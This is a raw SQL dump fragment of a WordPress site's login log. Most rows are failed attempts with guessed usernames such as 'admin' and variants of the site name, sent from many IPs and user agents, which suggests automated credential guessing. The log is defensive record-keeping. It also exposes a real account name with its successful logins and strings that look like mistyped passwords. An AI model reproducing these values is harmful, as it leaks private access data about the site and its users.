(8759, 31235, 1692503879.944700, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿn,}Š', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(8757, 31199, 1692464437.258946, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿg£ÀC', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(8756, 31197, 1692463413.104183, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ&34', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(8791, 31589, 1692901615.733275, 1, 'loginFailInvalidUsername', 'wordpress', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿsK™', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8790, 31588, 1692901610.168399, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¥í¥', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9035, 32357, 1694031196.250096, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿµ\n{J', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9034, 32356, 1694031193.576440, 1, 'loginFailInvalidUsername', 'howequipmentworks!', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¸R‰b', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9033, 32355, 1694031192.359876, 1, 'loginFailInvalidUsername', 'www.happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿºÃ›;', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9032, 32354, 1694031189.263477, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¾«¶Ò', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9031, 32353, 1694031186.598290, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿq¾ÒÑ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9030, 32352, 1694031182.051230, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-tr!', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9029, 32351, 1694031181.574419, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÈGYÔ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9028, 32350, 1694031176.543610, 1, 'loginFailInvalidUsername', 'www.happythinking.com!', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ”eE', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9027, 32349, 1694031171.693964, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ²r', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8961, 32085, 1693645732.289633, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿg.É;', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8962, 32085, 1693645732.303944, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿg.É;', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9011, 32333, 1694031117.954413, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÄp¾', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9012, 32334, 1694031119.385935, 1, 'loginFailInvalidUsername', 'username', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¿lžº', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9013, 32335, 1694031120.007668, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ³)Ð', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9014, 32336, 1694031122.617410, 1, 'loginFailInvalidUsername', 'happythinking.com!', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ±K[', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9015, 32337, 1694031125.045943, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿºË', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9016, 32338, 1694031126.165626, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿz¤Üð', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9017, 32339, 1694031129.349760, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ=œ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9018, 32340, 1694031133.413649, 1, 'loginFailInvalidUsername', 'howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿu³D', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9019, 32341, 1694031133.826861, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ$O‘', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9020, 32342, 1694031138.610615, 1, 'loginFailInvalidUsername', 'howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿmEÎ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9021, 32343, 1694031138.692964, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿw_ý}', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9022, 32344, 1694031152.591227, 1, 'loginFailInvalidUsername', 'admin!', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ)žß', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9023, 32345, 1694031156.632378, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ''!C', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9024, 32346, 1694031163.865211, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿOj{Û', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9025, 32347, 1694031168.901617, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿšÀ-	', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9026, 32348, 1694031169.505597, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ)¶ÖY', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8914, 32000, 1693604408.036007, 1, 'loginFailInvalidUsername', 'admin1654', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿcÏÍ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),
(8913, 31999, 1693604406.902069, 1, 'loginFailInvalidUsername', 'admin1654', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿcÏÍ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),
(9010, 32332, 1694031113.675172, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-¸Ë+', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9009, 32331, 1694031109.340056, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿq Û—', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9008, 32330, 1694031105.961278, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ''''O±', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9007, 32329, 1694031102.386795, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿŸ\0ìÅ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9006, 32328, 1694031086.676569, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ³B= ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8898, 31966, 1693431090.468300, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿP×f«', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(8899, 31969, 1693470111.044400, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ´ò;''', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8903, 31976, 1693521317.239255, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ±•„b', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8902, 31975, 1693521313.343122, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿƒH&â', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8901, 31974, 1693521309.580348, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÀd¿Ê', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8922, 32016, 1693618606.982968, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgd­Ó', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8921, 32015, 1693618603.544856, 1, 'loginFailInvalidUsername', 'happythinking.howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿªé!', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8920, 32006, 1693604415.065672, 1, 'loginFailInvalidUsername', 'admin1654', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿcÏÍ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),
(8919, 32005, 1693604414.204629, 1, 'loginFailInvalidUsername', 'admin1654', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿcÏÍ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),
(8918, 32004, 1693604413.282686, 1, 'loginFailInvalidUsername', 'admin1654', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿcÏÍ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),
(8917, 32003, 1693604412.343988, 1, 'loginFailInvalidUsername', 'admin1654', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿcÏÍ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),
(9005, 32327, 1694031083.326645, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ):ñt', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9004, 32326, 1694031081.768318, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ1äª ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9003, 32325, 1694031078.479517, 1, 'loginFailInvalidUsername', 'howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿsOO;', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9002, 32324, 1694031065.645565, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ±hñM', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9001, 32323, 1694031060.457022, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿQ[šj', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9000, 32322, 1694031060.068257, 1, 'loginFailInvalidUsername', 'username', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿY@5', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8999, 32321, 1694031054.575389, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ´ñð:', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8998, 32320, 1694031054.271246, 1, 'loginFailInvalidUsername', 'howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿN¤5"', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8933, 32027, 1693618678.993174, 1, 'loginFailInvalidUsername', 'happythinking.howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ’7o', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8932, 32026, 1693618672.217944, 1, 'loginFailInvalidUsername', 'howequipmentworks', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ´—’', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9649, 41091, 1701072894.815442, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÆb1«', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10'),
(9648, 41089, 1701072525.845699, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÇÃùÛ', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36'),
(9647, 41088, 1701071938.986478, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÆb>Ú', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/7.0.2 Safari/537.74.9'),
(9646, 41087, 1701071026.680655, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÆb1ª', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),
(9645, 41086, 1701070730.201086, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÇÃùÛ', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D167 Safari/9537.53'),
(9773, 41641, 1701278580.327916, 0, 'loginOK', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ—ãGì', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),
(9772, 41601, 1701275763.365440, 0, 'logout', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ—ãGì', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),
(9761, 41549, 1701256920.913758, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÆb:M', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(9762, 41552, 1701257285.955291, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÆb>Ú', 'Mozilla/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53'),
(9763, 41553, 1701261232.927135, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½þ', 'Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0'),
(9764, 41554, 1701262041.972617, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿhôL“', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(9765, 41567, 1701263691.894246, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½z', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),
(9766, 41569, 1701264526.649565, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½Q', 'Mozilla/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53'),
(9767, 41571, 1701266616.207058, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½z', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/7.0.2 Safari/537.74.9'),
(9768, 41583, 1701268871.771626, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-=¼i', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(9769, 41585, 1701270059.922810, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½•', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),
(9770, 41588, 1701272625.260368, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½\\', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0'),
(9771, 41600, 1701275582.348243, 0, 'loginOK', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ—ãGì', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),
(9427, 33202, 1694837331.561916, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÉ9', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36'),
(9426, 33201, 1694837326.635020, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgS½8', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36'),
(9405, 33182, 1694837197.101148, 1, 'loginFailInvalidUsername', 'happythinking@126.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÏ(,', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46'),
(9406, 33183, 1694837202.699825, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿq ÉÜ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36'),
(9407, 33184, 1694837206.559646, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿg:s<', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:88.0) Gecko/20100101 Firefox/88.0'),
(9408, 33185, 1694837210.163047, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-êví', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Safari/537.36'),
(9409, 33186, 1694837218.014524, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¶ÁÍ', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:88.0) Gecko/20100101 Firefox/88.0'),
(9410, 33187, 1694837222.372759, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ1ä0°', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36'),
(9411, 33188, 1694837228.131488, 1, 'loginFailInvalidUsername', 'bluesky1211234!1', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿg†&¼', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46'),
(9412, 33189, 1694837235.457352, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¶þ', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:88.0) Gecko/20100101 Firefox/88.0'),
(9413, 33189, 1694837235.466545, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¶þ', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:88.0) Gecko/20100101 Firefox/88.0'),
(9414, 33190, 1694837238.617700, 1, 'loginFailInvalidUsername', 'happythinking@hanmail.net', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgpÕ', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36'),
(9415, 33191, 1694837242.747158, 1, 'loginFailInvalidUsername', 'admin@happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿoZ½¢', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36'),
(9416, 33192, 1694837278.133079, 1, 'loginFailInvalidUsername', 'username', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿºœ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36 Edg/88.0.705.74'),
(9417, 33193, 1694837284.227700, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ½×R', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:88.0) Gecko/20100101 Firefox/88.0'),
(9418, 33194, 1694837288.171549, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿsòŸþ', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:88.0) Gecko/20100101 Firefox/88.0'),
(9419, 33195, 1694837296.006122, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿv­þ,', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36'),
(9420, 33195, 1694837296.017604, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿv­þ,', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36'),
(9421, 33196, 1694837299.727991, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿœÒ·ª', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36 Edg/88.0.705.74'),
